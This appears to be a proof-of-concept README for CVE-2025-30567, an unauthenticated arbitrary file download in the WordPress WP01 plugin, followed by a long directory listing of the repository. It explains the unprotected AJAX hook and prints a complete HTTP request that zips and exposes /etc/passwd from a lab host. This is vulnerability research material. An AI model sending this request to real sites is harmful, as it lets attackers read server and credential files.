Unauthorized Arbitrary File Download in WordPress WP01## Introduction
Unauthorized Arbitrary File Download in WordPress WP01!
## Environment setup
Step 1: Download the WP01 Plugin,But...
Haha, don't worry, here is the source code of the plugin.
Step 2: Package the provided wp01 folder and upload it to the WordPress plugins section.like this-->
## Analysis
It's simple—the vulnerability is triggered at the following point:
Next, check where the make_archive method is called.
Two AJAX action hooks are present—one for logged-in users and another for non-logged-in users. This is the reason for the unauthorized access vulnerability.
Alright, now let's craft the payload to read the contents of /etc/passwd on the local machine.
```
POST /wp-admin/admin-ajax.php?action=wp01_generate_zip_archive HTTP/1.1
Host: 192.168.43.133
accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: cb_lang=zh-cn; PHPSESSID=8b29e9ec5200189ba7e72e98d4c6d017; WS_ADMIN_URL=ws://192.168.43.133/notice; WS_CHAT_URL=ws://192.168.43.133/msg; wordpress_test_cookie=WP%20Cookie%20check; XDEBUG_SESSION=PHPSTORM; wp01-lang=en; wp_lang=en_US
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 24
target=passwd&path=/etc/
```
results:
OK, next, download this wp-01-passwd.zip file.
## Poc
Written based on Pocsuite3, see Poc_CVE-2025-30567.py for details.
## Reference
[CVE-2025-30567](https://nvd.nist.gov/vuln/detail/CVE-2025-30567)
[4.0K] /data/pocs/0dac0bb36cdf170fae8a2029c96ddd12ae53f9da
├── [2.9K] Poc_CVE-2025-30567.py
├── [1.8K] README.md
├── [4.0K] resources
│ ├── [308K] 1.png
│ ├── [493K] 2.png
│ ├── [248K] 3.png
│ ├── [278K] 4.png
│ ├── [303K] 5.png
│ ├── [335K] 6.png
│ ├── [142K] 7.png
│ └── [185K] 8.png
└── [4.0K] wp01
├── [4.0K] assets
│ ├── [4.0K] css
│ │ ├── [ 11K] style.css
│ │ ├── [2.3K] style.css.map
│ │ └── [ 11K] style.scss
│ ├── [4.0K] img
│ │ ├── [4.0K] adminer
│ │ │ ├── [ 40K] 10.png
│ │ │ ├── [ 40K] 11.png
│ │ │ ├── [ 39K] 1.png
│ │ │ ├── [ 49K] 2.png
│ │ │ ├── [ 21K] 3.png
│ │ │ ├── [ 27K] 4.png
│ │ │ ├── [ 19K] 5.png
│ │ │ ├── [4.3K] 6.png
│ │ │ ├── [ 11K] 7.png
│ │ │ ├── [ 21K] 8.png
│ │ │ └── [ 48K] 9.png
│ │ ├── [4.0K] backupwordpress
│ │ │ ├── [ 22K] 10.png
│ │ │ ├── [ 22K] 11.png
│ │ │ ├── [ 14K] 12.png
│ │ │ ├── [ 26K] 13.png
│ │ │ ├── [ 27K] 14.png
│ │ │ ├── [ 16K] 1.png
│ │ │ ├── [ 27K] 2.png
│ │ │ ├── [ 24K] 3.png
│ │ │ ├── [ 21K] 4.png
│ │ │ ├── [ 13K] 5.png
│ │ │ ├── [ 22K] 6.png
│ │ │ ├── [ 21K] 7.png
│ │ │ ├── [ 14K] 8.png
│ │ │ └── [ 13K] 9.png
│ │ ├── [4.0K] cpanel
│ │ │ ├── [ 14K] 10.png
│ │ │ ├── [ 27K] 11.png
│ │ │ ├── [ 15K] 12.png
│ │ │ ├── [ 27K] 13.png
│ │ │ ├── [ 15K] 14.png
│ │ │ ├── [ 34K] 1.png
│ │ │ ├── [ 25K] 2.png
│ │ │ ├── [ 27K] 3.png
│ │ │ ├── [ 26K] 4.png
│ │ │ ├── [ 27K] 5.png
│ │ │ ├── [ 27K] 6.png
│ │ │ ├── [ 26K] 7.png
│ │ │ ├── [ 33K] 8.png
│ │ │ └── [ 19K] 9.png
│ │ ├── [4.0K] cpanel2
│ │ │ ├── [ 17K] 1.png
│ │ │ ├── [ 37K] 2.png
│ │ │ ├── [ 39K] 3.png
│ │ │ ├── [ 39K] 4.png
│ │ │ ├── [5.8K] 5.png
│ │ │ ├── [ 35K] 6.png
│ │ │ └── [ 22K] 7.png
│ │ ├── [4.0K] cpanel3
│ │ │ ├── [ 33K] 1.png
│ │ │ └── [ 19K] 2.png
│ │ ├── [4.0K] directadmin
│ │ │ ├── [ 21K] 1.png
│ │ │ ├── [ 23K] 2.png
│ │ │ ├── [5.1K] 3.png
│ │ │ ├── [ 18K] 4.png
│ │ │ └── [ 14K] 5.png
│ │ ├── [4.0K] directadmin2
│ │ │ ├── [ 18K] 1.png
│ │ │ ├── [ 25K] 2.png
│ │ │ ├── [ 27K] 3.png
│ │ │ ├── [ 29K] 4.png
│ │ │ ├── [ 23K] 5.png
│ │ │ ├── [ 13K] 6.png
│ │ │ ├── [6.6K] 7.png
│ │ │ └── [ 27K] 8.png
│ │ ├── [4.0K] directadmin3
│ │ │ ├── [ 20K] 1.png
│ │ │ └── [ 13K] 2.png
│ │ ├── [4.0K] duplicator
│ │ │ ├── [ 13K] 10.png
│ │ │ ├── [ 15K] 11.png
│ │ │ ├── [7.8K] 12.png
│ │ │ ├── [ 16K] 13.png
│ │ │ ├── [ 20K] 14.png
│ │ │ ├── [ 14K] 15.png
│ │ │ ├── [ 16K] 1.png
│ │ │ ├── [ 31K] 2.png
│ │ │ ├── [ 32K] 3.png
│ │ │ ├── [ 21K] 4.png
│ │ │ ├── [ 15K] 5.png
│ │ │ ├── [ 11K] 6.png
│ │ │ ├── [ 30K] 7.png
│ │ │ ├── [ 21K] 8.png
│ │ │ └── [ 12K] 9.png
│ │ ├── [4.0K] ftp
│ │ │ ├── [ 49K] 0.png
│ │ │ ├── [ 25K] 1.png
│ │ │ ├── [ 36K] 2.png
│ │ │ ├── [ 31K] 3.png
│ │ │ ├── [ 70K] 4.png
│ │ │ └── [4.3K] 5.png
│ │ ├── [4.0K] icons
│ │ │ ├── [4.0K] 3
│ │ │ │ ├── [3.7K] a3-lazy-load_m.jpg
│ │ │ │ ├── [3.0K] advanced-cron-manager_m.jpg
│ │ │ │ ├── [ 688] advanced-db-cleaner_s.jpg
│ │ │ │ ├── [ 542] artiss-transient-cleaner_s.jpg
│ │ │ │ ├── [3.2K] async-javascript_m.jpg
│ │ │ │ ├── [3.1K] autoptimize_m.jpg
│ │ │ │ ├── [ 469] better-resource-hints_s.jpg
│ │ │ │ ├── [ 687] bj-lazy-load_s.jpg
│ │ │ │ ├── [ 606] cache-enabler_s.jpg
│ │ │ │ ├── [ 640] clearfy_s.jpg
│ │ │ │ ├── [1.9K] css-js-manager_m.jpg
│ │ │ │ ├── [ 696] css-js-manager_s.jpg
│ │ │ │ ├── [1.9K] db-cache-reloaded-fix_m.jpg
│ │ │ │ ├── [ 431] delete-expired-transients_s.jpg
│ │ │ │ ├── [2.8K] disqus-conditional-load_m.jpg
│ │ │ │ ├── [ 571] embed-google-fonts_s.jpg
│ │ │ │ ├── [ 546] ewww-image-optimizer_s.jpg
│ │ │ │ ├── [ 650] fast-velocity-minify_s.jpg
│ │ │ │ ├── [3.7K] gonzales_m.jpg
│ │ │ │ ├── [3.0K] heartbeat-control_m.jpg
│ │ │ │ ├── [ 593] host-analyticsjs-local_s.jpg
│ │ │ │ ├── [2.8K] host-webfonts-local_m.jpg
│ │ │ │ ├── [2.8K] http2-push-content_m.jpg
│ │ │ │ ├── [ 687] imagify_s.jpg
│ │ │ │ ├── [ 546] lazy-load-xt_s.jpg
│ │ │ │ ├── [ 577] leira-cron-jobs_s.jpg
│ │ │ │ ├── [3.5K] local-google-analytics_m.jpg
│ │ │ │ ├── [3.8K] media-cleaner_m.jpg
│ │ │ │ ├── [ 529] memory-usage-bar_s.jpg
│ │ │ │ ├── [ 477] mobble_s.jpg
│ │ │ │ ├── [ 498] nietzsche_s.jpg
│ │ │ │ ├── [ 667] optimole-wp_s.jpg
│ │ │ │ ├── [ 759] pagespeed-ninja_s.jpg
│ │ │ │ ├── [3.0K] plugin-load-filter_m.jpg
│ │ │ │ ├── [ 663] plugin-organizer_s.jpg
│ │ │ │ ├── [ 680] query-monitor_s.jpg
│ │ │ │ ├── [1.1K] remove-jquery-migrate_m.jpg
│ │ │ │ ├── [ 513] remove-wp-overhead_s.jpg
│ │ │ │ ├── [ 627] rocket-lazy-load_s.jpg
│ │ │ │ ├── [ 336] selfhost-google-fonts_s.jpg
│ │ │ │ ├── [1.6K] server-ip-memory-usage_m.jpg
│ │ │ │ ├── [ 696] shortpixel-image-optimiser_s.jpg
│ │ │ │ ├── [ 613] tiny-compress-images_s.jpg
│ │ │ │ ├── [3.4K] transients-manager_m.jpg
│ │ │ │ ├── [3.5K] true-lazy-analytics_m.jpg
│ │ │ │ ├── [2.7K] usagedd_m.jpg
│ │ │ │ ├── [ 12K] version-control-for-jquery_m.jpg
│ │ │ │ ├── [ 660] w3-total-cache_s.jpg
│ │ │ │ ├── [ 511] webp-converter-for-media_s.jpg
│ │ │ │ ├── [2.8K] webp-express_m.jpg
│ │ │ │ ├── [2.0K] widget-output-cache_m.jpg
│ │ │ │ ├── [ 658] wp-asset-clean-up_s.jpg
│ │ │ │ ├── [ 504] wp-clean-head_s.jpg
│ │ │ │ ├── [ 669] wp-cleanup-optimizer_s.jpg
│ │ │ │ ├── [ 703] wp-crontrol_s.jpg
│ │ │ │ ├── [ 491] wp-dbmanager_s.jpg
│ │ │ │ ├── [ 651] wp-fastest-cache_s.jpg
│ │ │ │ ├── [1.5K] wp-head-cleaner_m.jpg
│ │ │ │ ├── [ 508] wp-memory_s.jpg
│ │ │ │ ├── [ 842] wp-mobile-detect_m.jpg
│ │ │ │ ├── [2.8K] wp-optimize_m.jpg
│ │ │ │ ├── [ 610] wp-optimize_s.jpg
│ │ │ │ ├── [ 434] wps-cleaner_s.jpg
│ │ │ │ ├── [3.8K] wp-smush_m.jpg
│ │ │ │ └── [2.1K] wp-super-cache_m.jpg
│ │ │ ├── [4.0K] 4
│ │ │ │ ├── [ 517] add-link-to-copied-text_s.jpg
│ │ │ │ ├── [ 589] advanced-nocaptcha-recaptcha_s.jpg
│ │ │ │ ├── [ 507] akismet_s.jpg
│ │ │ │ ├── [2.4K] all-in-one-wp-security-and-firewall_m.jpg
│ │ │ │ ├── [2.8K] antispam-bee_m.jpg
│ │ │ │ ├── [3.7K] antispambot_m.jpg
│ │ │ │ ├── [ 721] anti-spam_s.jpg
│ │ │ │ ├── [1.5K] append-link-on-copy_m.jpg
│ │ │ │ ├── [ 659] better-wp-security_s.jpg
│ │ │ │ ├── [ 574] blob-mimes_s.jpg
│ │ │ │ ├── [3.3K] cleantalk-spam-protect_m.jpg
│ │ │ │ ├── [ 496] copy-link_s.jpg
│ │ │ │ ├── [ 622] email-address-encoder_s.jpg
│ │ │ │ ├── [ 672] email-encoder-bundle_s.jpg
│ │ │ │ ├── [ 613] goodbye-captcha_s.jpg
│ │ │ │ ├── [ 577] google-captcha_s.jpg
│ │ │ │ ├── [2.5K] gotmls_m.jpg
│ │ │ │ ├── [1.9K] http-headers_m.jpg
│ │ │ │ ├── [ 682] http-headers_s.jpg
│ │ │ │ ├── [ 518] http-security_s.jpg
│ │ │ │ ├── [3.1K] kama-spamblock_m.jpg
│ │ │ │ ├── [ 576] login-nocaptcha_s.jpg
│ │ │ │ ├── [ 498] nietzsche_s.jpg
│ │ │ │ ├── [1.6K] no-captcha-recaptcha_m.jpg
│ │ │ │ ├── [2.6K] safe-svg_m.jpg
│ │ │ │ ├── [ 657] secure-copy-content-protection_s.jpg
│ │ │ │ ├── [2.6K] security-headers_m.jpg
│ │ │ │ ├── [ 478] security-headers_s.jpg
│ │ │ │ ├── [ 538] simple-mail-address-encoder_s.jpg
│ │ │ │ ├── [ 726] svg-support_s.jpg
│ │ │ │ ├── [3.3K] the-hack-repair-guys-admin-login-notifier_m.jpg
│ │ │ │ ├── [ 717] wordfence_s.jpg
│ │ │ │ ├── [ 586] wp-cerber_s.jpg
│ │ │ │ ├── [ 504] wp-clean-head_s.jpg
│ │ │ │ ├── [3.2K] wp-content-copy-protector_m.jpg
│ │ │ │ ├── [ 479] wp-copy-content-protection_s.jpg
│ │ │ │ ├── [ 430] wp-copyprotect_s.jpg
│ │ │ │ ├── [ 708] wp-copy-protect-with-color-design_s.jpg
│ │ │ │ ├── [1.5K] wp-head-cleaner_m.jpg
│ │ │ │ └── [ 706] zero-spam_s.jpg
│ │ │ ├── [4.0K] 5
│ │ │ │ ├── [ 506] 301-redirects_s.jpg
│ │ │ │ ├── [ 459] add-any-extension-to-pages_s.jpg
│ │ │ │ ├── [ 517] all-in-one-seo-pack_s.jpg
│ │ │ │ ├── [ 526] append-extensions-on-pages_s.jpg
│ │ │ │ ├── [ 709] autodescription_s.jpg
│ │ │ │ ├── [2.4K] broken-link-checker_m.jpg
│ │ │ │ ├── [ 453] clearfy_s.jpg
│ │ │ │ ├── [ 545] contextual-related-posts_s.jpg
│ │ │ │ ├── [1.8K] cyrlitera_m.jpg
│ │ │ │ ├── [ 724] cyr-to-lat_s.jpg
│ │ │ │ ├── [1021] disable-feeds_m.jpg
│ │ │ │ ├── [ 557] easy-broken-link-checker_s.jpg
│ │ │ │ ├── [ 466] eps-301-redirects_s.jpg
│ │ │ │ ├── [1.7K] google-sitemap-generator_m.jpg
│ │ │ │ ├── [ 420] google-sitemap-plugin_s.jpg
│ │ │ │ ├── [ 747] intelly-related-posts_s.jpg
│ │ │ │ ├── [ 673] link-whisper_s.jpg
│ │ │ │ ├── [3.1K] mihdan-no-external-links_m.jpg
│ │ │ │ ├── [ 476] no-category-base-wpml_s.jpg
│ │ │ │ ├── [ 794] no-external-links_s.jpg
│ │ │ │ ├── [2.3K] php-on-pages_m.jpg
│ │ │ │ ├── [2.2K] redirection_m.jpg
│ │ │ │ ├── [ 628] related-posts-thumbnails_s.jpg
│ │ │ │ ├── [1.7K] remove-category-url_m.jpg
│ │ │ │ ├── [ 508] rus-to-lat_s.jpg
│ │ │ │ ├── [ 621] seo-by-rank-math_s.jpg
│ │ │ │ ├── [ 515] seo-redirection_s.jpg
│ │ │ │ ├── [ 478] simple-wp-sitemap_s.jpg
│ │ │ │ ├── [1.1K] tac_m.jpg
│ │ │ │ ├── [ 569] title-and-nofollow-for-links_s.jpg
│ │ │ │ ├── [ 554] top-10_s.jpg
│ │ │ │ ├── [ 511] wlink-checker_s.jpg
│ │ │ │ ├── [1.6K] wordpress-popular-posts_m.jpg
│ │ │ │ ├── [3.8K] wordpress-seo_m.jpg
│ │ │ │ ├── [ 708] wpa-seo-auto-linker_s.jpg
│ │ │ │ ├── [ 633] wp-authenticity-checker-wac_s.jpg
│ │ │ │ ├── [ 776] wp-external-links_s.jpg
│ │ │ │ ├── [2.0K] wp-internal-linkjuicer_m.jpg
│ │ │ │ ├── [ 741] wp-seo_s.jpg
│ │ │ │ ├── [ 491] wp-translitera_s.jpg
│ │ │ │ ├── [ 591] wp-trending-post-slider-and-widget_s.jpg
│ │ │ │ └── [1.4K] yarpp_m.jpg
│ │ │ └── [4.0K] 6
│ │ │ ├── [3.2K] code-snippets_m.jpg
│ │ │ ├── [ 700] dco-insert-analytics-code_s.jpg
│ │ │ ├── [ 661] disable-wordpress-updates_s.jpg
│ │ │ ├── [ 586] header-and-footer-scripts_s.jpg
│ │ │ ├── [ 487] header-footer_s.jpg
│ │ │ ├── [ 736] jetpack_s.jpg
│ │ │ ├── [2.0K] luckywp-scripts-control_m.jpg
│ │ │ ├── [ 697] my-custom-functions_s.jpg
│ │ │ ├── [ 639] stops-core-theme-and-plugin-updates_s.jpg
│ │ │ ├── [1.9K] webcraftic-updates-manager_m.jpg
│ │ │ ├── [ 683] widget-output-cache_s.jpg
│ │ │ ├── [ 648] wordpress-mobile-pack_s.jpg
│ │ │ ├── [3.1K] wp-downgrade_m.jpg
│ │ │ ├── [2.5K] wp-rollback_m.jpg
│ │ │ └── [1.2K] wptouch_m.jpg
│ │ ├── [4.0K] isp
│ │ │ ├── [ 15K] 1.png
│ │ │ ├── [ 31K] 2.png
│ │ │ ├── [ 14K] 3.png
│ │ │ ├── [ 13K] 4.png
│ │ │ ├── [ 16K] 5.png
│ │ │ ├── [ 32K] 6.png
│ │ │ └── [ 33K] 7.png
│ │ ├── [4.0K] isp2
│ │ │ ├── [ 15K] 1.png
│ │ │ ├── [ 36K] 2.png
│ │ │ └── [ 24K] 3.png
│ │ ├── [4.0K] nic
│ │ │ ├── [ 19K] 1.png
│ │ │ ├── [ 18K] 2.png
│ │ │ └── [ 30K] 3.png
│ │ ├── [4.0K] phpmyadmin
│ │ │ ├── [ 27K] 1.png
│ │ │ ├── [ 21K] 2.png
│ │ │ ├── [ 30K] 3.png
│ │ │ ├── [ 51K] 4.png
│ │ │ └── [ 23K] 5.png
│ │ ├── [4.0K] reg
│ │ │ ├── [ 13K] 1.png
│ │ │ ├── [2.3K] 2.png
│ │ │ ├── [8.6K] 3.png
│ │ │ ├── [ 55K] 4.png
│ │ │ ├── [2.0K] 5.png
│ │ │ └── [1.9K] 6.png
│ │ ├── [4.0K] sypexdumper
│ │ │ ├── [ 37K] 10.png
│ │ │ ├── [ 49K] 1.png
│ │ │ ├── [ 21K] 2.png
│ │ │ ├── [ 29K] 3.png
│ │ │ ├── [ 23K] 4.png
│ │ │ ├── [4.3K] 5.png
│ │ │ ├── [ 15K] 6.png
│ │ │ ├── [ 21K] 7.png
│ │ │ ├── [ 43K] 8.png
│ │ │ └── [ 37K] 9.png
│ │ └── [4.0K] updraftplus
│ │ ├── [4.4K] 10.png
│ │ ├── [ 17K] 11.png
│ │ ├── [ 21K] 12.png
│ │ ├── [ 25K] 13.png
│ │ ├── [ 23K] 14.png
│ │ ├── [ 16K] 15.png
│ │ ├── [8.7K] 16.png
│ │ ├── [ 16K] 1.png
│ │ ├── [ 27K] 2.png
│ │ ├── [ 31K] 3.png
│ │ ├── [ 22K] 4.png
│ │ ├── [ 32K] 5.png
│ │ ├── [ 31K] 6.png
│ │ ├── [ 39K] 7.png
│ │ ├── [ 31K] 8.png
│ │ └── [ 19K] 9.png
│ └── [4.0K] js
│ ├── [ 13K] main.js
│ └── [ 704] notice.js
├── [4.0K] content
│ ├── [2.8K] admin-page-nav.php
│ ├── [2.8K] admin-page.php
│ ├── [4.0K] en
│ │ ├── [ 712] head.php
│ │ ├── [ 958] notice.php
│ │ ├── [1.4K] step-1.php
│ │ ├── [ 85K] step-2.php
│ │ ├── [120K] step-3.php
│ │ ├── [ 60K] step-4.php
│ │ ├── [ 31K] step-5.php
│ │ ├── [ 16K] step-6.php
│ │ └── [3.1K] step-7.php
│ ├── [ 0] recovery.pdf
│ └── [4.0K] ru
│ ├── [ 982] head.php
│ ├── [1.2K] notice.php
│ ├── [1.9K] step-1.php
│ ├── [ 85K] step-2.php
│ ├── [137K] step-3.php
│ ├── [ 72K] step-4.php
│ ├── [ 36K] step-5.php
│ ├── [ 19K] step-6.php
│ └── [3.8K] step-7.php
├── [4.0K] inc
│ ├── [3.8K] class-wp01-content.php
│ ├── [8.5K] class-wp01-installer.php
│ ├── [ 11K] class-wp01.php
│ └── [7.1K] class-wp01-table.php
├── [ 68] index.php
├── [4.0K] languages
│ ├── [5.1K] WP01-en_US.mo
│ ├── [7.4K] WP01-en_US.po
│ ├── [5.6K] WP01.pot
│ ├── [6.2K] WP01-ru_RU.mo
│ └── [8.8K] WP01-ru_RU.po
├── [6.7K] readme.txt
└── [1.0K] wp01.php
33 directories, 344 files